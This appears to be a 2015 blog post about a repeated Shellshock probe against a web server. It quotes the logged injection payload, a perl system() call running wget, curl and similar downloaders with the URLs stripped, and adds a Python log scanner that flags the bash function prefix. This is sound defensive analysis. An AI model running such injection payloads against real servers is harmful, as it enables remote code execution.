Saturday, 25 April 2015

perl script injection again

The same style of attack as reported some days ago hit the system again last night:

- - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"wget http// ; wget --no-check-certificate ; curl http// ; curl -k ; lwp-download ; GET ; lynx ; wget ; curl ; fetch ; lwp-download ; GET ; lynx\");'"

Judging by the commands above (wget --no-check-certificate), it seems that the idea behind this attack was to download and replace the index.html page. Just for the record: if you already have an index.html page in the download directory, wget will simply put an index.html.1 page there. If you only have an index.php, this attack could maybe work, but it seems odd.

The system was again hit 30 times within a short time range. So even if it had worked, it would have resulted in 30 index.html files.

When testing the link against VirusTotal, there was no result.
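To find and count requests like the one logged above, the following added example (not part of the original post) scans Apache combined-format log lines for the bash function-definition prefix `() {` in the request, referer or user-agent field. The sample lines, their client addresses and the PLACEHOLDER payload are constructed for illustration.

```python
import re
from collections import Counter

# Apache "combined" format; quoted fields may contain backslash-escaped quotes.
LINE_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
# Bash function-definition prefix seen in the logged User-Agent, tolerant of spacing.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')

# Constructed sample lines (documentation IP ranges, placeholder payload).
SAMPLE_LOG = r'''
192.0.2.10 - - [25/Apr/2015:09:11:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.1" 404 477 "-" "() { :;};/usr/bin/perl -e 'print \"PLACEHOLDER\";'"
192.0.2.10 - - [25/Apr/2015:09:11:49 +0200] "GET /cgi-bin/test.cgi HTTP/1.1" 404 470 "-" "() { :;};/usr/bin/perl -e 'print \"PLACEHOLDER\";'"
198.51.100.7 - - [25/Apr/2015:09:12:01 +0200] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
'''.strip().splitlines()


def find_shellshock_probes(lines):
    """Return one record per log line whose client-controlled fields carry '() {'."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # not in combined format; skip rather than guess
        for field in ("request", "referer", "agent"):
            if SHELLSHOCK_RE.search(m.group(field)):
                parts = m.group("request").split()
                hits.append({
                    "host": m.group("host"),
                    "time": m.group("time"),
                    "path": parts[1] if len(parts) >= 2 else "",
                    "status": int(m.group("status")),
                    "field": field,
                })
                break  # one record per line is enough
    return hits


def count_by_host(hits):
    """Number of probe requests per client address, to spot bursts."""
    return Counter(h["host"] for h in hits)


if __name__ == "__main__":
    probes = find_shellshock_probes(SAMPLE_LOG)
    for host, n in count_by_host(probes).most_common():
        print(f"{host}: {n} probe(s), paths: {sorted({p['path'] for p in probes if p['host'] == host})}")
```

A 404 status on every hit, as in the logged request, means the probed CGI path does not exist on the server; any hit with a 200 status deserves a closer look.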